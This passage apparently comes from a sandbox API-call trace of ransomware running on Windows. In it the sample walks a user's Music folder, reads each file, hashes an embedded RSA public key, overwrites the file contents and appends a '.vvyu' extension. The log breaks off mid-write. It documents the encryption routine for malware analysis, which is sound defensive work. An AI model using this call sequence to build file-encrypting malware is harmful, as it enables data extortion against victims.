lpOverlapped=0x0) returned 1 [0197.532] CloseHandle (hObject=0x584) returned 1 [0197.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0197.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.534] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\dhVO\\fwWKBmZrXnqYjnf.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\26hkdh\\dhvo\\fwwkbmzrxnqyjnf.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\dhVO\\fwWKBmZrXnqYjnf.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\26hkdh\\dhvo\\fwwkbmzrxnqyjnf.mp3.vvyu")) returned 1 [0197.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.537] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0197.541] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53e501f0, ftCreationTime.dwHighDateTime=0x1d8a555, ftLastAccessTime.dwLowDateTime=0xf274b0d0, ftLastAccessTime.dwHighDateTime=0x1d8a722, ftLastWriteTime.dwLowDateTime=0xf274b0d0, ftLastWriteTime.dwHighDateTime=0x1d8a722, nFileSizeHigh=0x0, nFileSizeLow=0x126ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="waqplOJ2C0tw.wav", cAlternateFileName="WAQPLO~1.WAV")) returned 1 [0197.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0197.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x345758 [0197.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0197.541] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\dhVO\\waqplOJ2C0tw.wav") returned=".wav" [0197.541] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\dhVO\\waqplOJ2C0tw.wav" (normalized: "c:\\users\\keecfmwgj\\music\\26hkdh\\dhvo\\waqploj2c0tw.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0197.543] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=75502) returned 1 [0197.543] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0197.547] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x126c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.547] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0197.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0197.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.551] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.551] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x126ee, lpOverlapped=0x0) returned 1 [0197.552] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0197.552] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.552] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.552] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0197.553] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0197.553] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.553] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0197.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0197.553] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0197.554] GetLastError () returned 0x0 [0197.554] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0197.554] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0197.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.554] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0197.554] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0197.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.554] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0197.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0197.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x126f0) returned 0x2af5168 [0197.555] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0197.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0197.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0197.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea800 [0197.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6788 [0197.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea848 [0197.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67a0 [0197.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67d0 [0197.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6830 [0197.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67e8 [0197.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0197.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0197.556] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0197.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0197.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67d0 | out: hHeap=0x2c0000) returned 1 [0197.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67e8 | out: hHeap=0x2c0000) returned 1 [0197.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6830 | out: hHeap=0x2c0000) returned 1 [0197.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0197.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6830 [0197.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0197.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67e8 [0197.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0197.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae67d0 [0197.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0197.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0197.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0197.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0197.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0197.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0197.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0197.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0197.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67e8 | out: hHeap=0x2c0000) returned 1 [0197.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67d0 | out: hHeap=0x2c0000) returned 1 [0197.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6830 | out: hHeap=0x2c0000) returned 1 [0197.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0197.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0197.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0197.561] GetCurrentThreadId () returned 0x5d8 [0197.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0197.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af29c0 [0197.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0197.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0197.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0197.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0197.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0197.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.562] GetCurrentThreadId () returned 0x5d8 [0197.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0197.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0197.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40160 [0197.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0197.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0197.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6830 [0197.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0197.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0197.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0197.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0197.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0197.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67d0 [0197.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0197.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0197.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0197.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0197.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67e8 [0197.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0197.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0197.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0197.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67b8 [0197.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0197.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6848 [0197.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0197.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6818 [0197.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6800 [0197.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6860 [0197.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6800 | out: hHeap=0x2c0000) returned 1 [0197.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6800 [0197.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6818 | out: hHeap=0x2c0000) returned 1 [0197.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0197.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0197.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0197.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67d0 | out: hHeap=0x2c0000) returned 1 [0197.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67d0 [0197.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0197.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6830 | out: hHeap=0x2c0000) returned 1 [0197.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0197.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6860 | out: hHeap=0x2c0000) returned 1 [0197.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0197.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0197.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0197.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0197.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67d0 | out: hHeap=0x2c0000) returned 1 [0197.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0197.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0197.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0197.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0197.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0197.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0197.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0197.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0197.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0197.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0197.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6800 | out: hHeap=0x2c0000) returned 1 [0197.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6848 | out: hHeap=0x2c0000) returned 1 [0197.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67e8 | out: hHeap=0x2c0000) returned 1 [0197.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67b8 | out: hHeap=0x2c0000) returned 1 [0197.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0197.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0197.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67a0 | out: hHeap=0x2c0000) returned 1 [0197.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea848 | out: hHeap=0x2c0000) returned 1 [0197.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0197.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0197.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0197.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0197.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0197.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.573] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x126e9, 